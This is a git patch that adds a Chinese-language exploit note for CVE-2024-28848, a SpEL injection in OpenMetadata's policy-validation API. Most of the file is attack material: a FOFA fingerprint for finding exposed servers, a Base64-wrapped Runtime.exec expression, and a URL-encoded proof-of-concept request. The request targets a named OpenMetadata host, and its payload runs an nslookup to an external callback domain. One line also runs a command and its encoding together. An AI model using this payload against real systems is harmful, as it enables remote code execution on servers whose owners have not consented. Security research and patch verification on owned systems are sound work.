From db9d6fd9250a26f988296bbd6144a49b2786e20f Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 2 May 2024 14:51:49 +0800 Subject: [PATCH] =?UTF-8?q?Create=20OpenMetadata-SpEL=E6=B3=A8=E5=85=A5(CV?= =?UTF-8?q?E-2024-28848).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- OpenMetadata-SpEL注入(CVE-2024-28848).md | 30 ++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 OpenMetadata-SpEL注入(CVE-2024-28848).md diff --git a/OpenMetadata-SpEL注入(CVE-2024-28848).md b/OpenMetadata-SpEL注入(CVE-2024-28848).md new file mode 100644 index 0000000..be672f4 --- /dev/null +++ b/OpenMetadata-SpEL注入(CVE-2024-28848).md @@ -0,0 +1,30 @@ +## OpenMetadata-SpEL注入(CVE-2024-28848) + +只有经过身份验证的用户才能访问 /api/v1/policies, 未经身份验证的用户将无法访问这些 API 来利用此漏洞。用户必须存在于 OpenMetadata 中,并且已对自己进行身份验证才能利用此漏洞。 + +## fofa +``` +icon_hash="733091897" +``` + +以 Base64 编码 + +=>`touch /tmp/pwneddG91Y2ggL3RtcC9wd25lZA==` + +运行系统命令的 + +SpEL 表达式:`T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode("dG91Y2ggL3RtcC9wd25lZA==")))` + +使用 URL 编码对有效负载进行编码: + +``` +%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%54%28%6a%61%76%61%2e%75%74%69%6c%2e%42%61%73%65%36%34%29%2e%67%65%74%44%65%63%6f%64%65%72%28%29%2e%64%65%63%6f%64%65%28%22%64%47%39%31%59%32%67%67%4c%33%52%74%63%43%39%77%64%32%35%6c%5a%41%3d%3d%22%29%29%29 +``` + +## poc +``` +GET /api/v1/policies/validation/condition/%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%54%28%6a%61%76%61%2e%75%74%69%6c%2e%42%61%73%65%36%34%29%2e%67%65%74%44%65%63%6f%64%65%72%28%29%2e%64%65%63%6f%64%65%28%22%62%6e%4e%73%62%32%39%72%64%58%41%67%61%58%70%73%4e%7a%45%33%62%33%42%69%62%57%52%79%5a%57%46%6f%61%33%4a%6f%63%44%4e%72%63%32%70%72%61%47%4a%75%4d%6d%4a%7a%65%6d%67%75%62%32%46%7a%64%47%6c%6d%65%53%35%6a%62%32%30%3d%22%29%29%29 HTTP/2 +Host: sandbox.open-metadata.org +Authorization: Bearer + +```